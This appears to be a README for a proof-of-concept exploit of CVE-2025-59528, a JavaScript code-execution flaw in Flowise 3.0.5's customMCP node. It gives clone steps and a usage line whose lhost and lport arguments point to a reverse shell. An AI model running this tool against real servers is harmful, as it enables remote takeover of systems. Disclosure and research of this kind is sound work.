Share
## https://sploitus.com/exploit?id=1D2ED15F-C3BE-5DEF-9DE7-CE96563EDE5C
# CVE-2025-59528 โ€“ Flowise CustomMCP Node RCE (PoC)

[![Visitors](https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fvanhari%2FCVE-2025-59528&countColor=%23263759)](https://visitorbadge.io/status?path=https%3A%2F%2Fgithub.com%2Fvanhari%2FCVE-2025-59528)

## Overview

This repo containts proof of concept demonstrating **CVE-2025-59528** in Flowise v3.0.5


The vulnerability exists in the `customMCP` node, where user-supplied `mcpServerConfig` input is processed in a way that leads to JavaScript code execution via unsafe evaluation using the `Function` constructor.


## Affected Versions
| Affected | Fixed |
|----------|-------|
|   3.0.5  | 3.0.6 |


## Impact
An authenticated user may be able to execute arbitrary JavaScript on the server, potentially leading to remote code execution.

## Installation

### OSX/Linux
```bash
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
```

### Windows
```bash
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
```

## Usage
```bash
python3 CVE-2025-59528.py -t "" --api-key  --lhost  --lport 
```
![Usage](/assets/usage.png)

## Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.